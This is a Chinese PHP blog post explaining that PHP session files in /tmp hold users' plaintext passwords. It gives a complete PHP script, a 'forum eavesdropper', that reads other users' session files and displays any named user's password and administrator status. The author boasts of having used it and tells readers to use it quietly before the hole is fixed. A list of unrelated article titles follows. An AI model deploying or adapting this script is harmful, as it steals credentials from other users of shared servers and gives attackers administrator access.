php查看session内容的函数


Posted in PHP onAugust 27, 2008

如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:
<?
function submit1(){
global $username;
print "<title>论坛监听器</title>";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "你也太黑了吧?连我你也查?";
return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]=="\"".$username."\""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "用户笔名:".$name[2]."<br>使用密码:".$passwd[2]."<br>使用模式:";
if($mode[1]==1)
print "<font color=red>管理员</font>";
else
print "一般用户";
print"<br><br>偷窃他人密码是不道德行为请少少为之<br>";
$i=1;
break;
}}}}
if(!$i)
print "用户:".$username."真的在线吗?如你确定,<a href='javascript:history.go(-1)'>请再来一次</a>,不要多打空格!";
$d->close();
}

function login(){
?>
<html>
<head>
<title>论坛监听器</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<div align="center">
<p>论坛监听器 </p>
<p> </p>
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="2">当你看到一用户在线时你想看他的密码,你要如何作呢?</td>
</tr>
<tr>
<td colspan="2">让我来告诉你:就是使用本程序。</td>
</tr>
<tr>
<td colspan="2"><font color=red>郑重申明:本程序为自由程序,由它所造成的任何损失本人盖不负责。</font>
<br>不过这个问题也许很快就会被堵上,个位还是不要张扬的偷着用吧。</td>
</tr>
</table>
<form name="form1" method="post" action="<?print $PHP_SELF ?>" >
<p>请输入你要查的用户名:<br>
<input type="text" name="username">
</p>
<p>
<input type="submit" name="submit1" value="我同意以上申明,开始查找">
</p>
</form>
<p> </p>
</div>
</body>
</html>
<?
}
//--------------main()
if($submit1)
submit1();
else
login();
?>

PHP 相关文章推荐
php 特殊字符处理函数
Sep 05 PHP
php带密码功能并下载远程文件保存本地指定目录 修改加强版
May 16 PHP
通过JavaScript或PHP检测Android设备的代码
Mar 09 PHP
php日历制作代码分享
Jan 20 PHP
PHP header()函数常用方法总结
Apr 11 PHP
php最简单的删除目录与文件实现方法
Nov 28 PHP
php使用NumberFormatter格式化货币的方法
Mar 21 PHP
php正则替换处理HTML页面的方法
Jun 17 PHP
PHP实现删除字符串中任何字符的函数
Aug 11 PHP
CodeIgniter扩展核心类实例详解
Jan 20 PHP
ucenter中词语过滤原理分析
Jul 13 PHP
PHP中strval()函数实例用法
Jun 07 PHP
php 缓存函数代码
Aug 27 #PHP
php 中文处理函数集合
Aug 27 #PHP
常用的php对象类型判断
Aug 27 #PHP
phpMyAdmin2.11.6安装配置方法
Aug 24 #PHP
PHP6 先修班 JSON实例代码
Aug 23 #PHP
php的curl实现get和post的代码
Aug 23 #PHP
PHP Smarty生成EXCEL文档的代码
Aug 23 #PHP
You might like
Laravel中批量赋值Mass-Assignment的真正含义详解
2017/09/29 PHP
js中将具有数字属性名的对象转换为数组
2011/03/06 Javascript
JS trim去空格的最佳实践
2011/10/30 Javascript
js改变文章字体大小的实例代码
2013/11/27 Javascript
用C/C++来实现 Node.js 的模块(一)
2014/09/24 Javascript
javascript继承机制实例详解
2014/11/20 Javascript
详解JS函数重载
2014/12/04 Javascript
AngularJS实现星星等级评分功能
2016/09/24 Javascript
浅谈js键盘事件全面控制
2016/12/01 Javascript
非常优秀的JS图片轮播插件Swiper的用法
2017/01/03 Javascript
使用AngularJS编写多选按钮选中时触发指定方法的指令代码详解
2017/07/24 Javascript
浅谈es6语法 (Proxy和Reflect的对比)
2017/10/24 Javascript
解决layui页面按钮点击无反应,也不报错的问题
2019/09/29 Javascript
简单了解JavaScript sort方法
2019/11/25 Javascript
微信小程序实现吸顶特效
2020/01/08 Javascript
vue+vant实现商品列表批量倒计时功能
2020/01/13 Javascript
vue+node 实现视频在线播放的实例代码
2020/10/19 Javascript
[01:25]2015国际邀请赛最佳短片奖——斧王《拆塔英雄:天赋异禀》
2015/09/22 DOTA
详解python函数传参是传值还是传引用
2018/01/16 Python
Python反射的用法实例分析
2018/02/11 Python
python3.6.3安装图文教程 TensorFlow安装配置方法
2020/06/24 Python
python编写猜数字小游戏
2019/10/06 Python
python文件处理fileinput使用方法详解
2020/01/02 Python
python 绘制国旗的示例
2020/09/27 Python
python获取命令行参数实例方法讲解
2020/11/02 Python
德国运动营养和健身网上商店:Myprotein.de
2018/07/18 全球购物
土木建筑学生自我评价
2014/01/14 职场文书
一句话工作感言
2014/03/01 职场文书
初三新学期计划书
2014/05/03 职场文书
代理人委托书
2014/08/01 职场文书
2014年学校党建工作总结
2014/11/11 职场文书
2014年管理人员工作总结
2014/12/01 职场文书
迎国庆主题班会
2015/08/17 职场文书
如何在centos上使用yum安装rabbitmq-server
2021/03/31 Servers
go语言中json数据的读取和写出操作
2021/04/28 Golang
Python序列化模块JSON与Pickle
2022/06/05 Python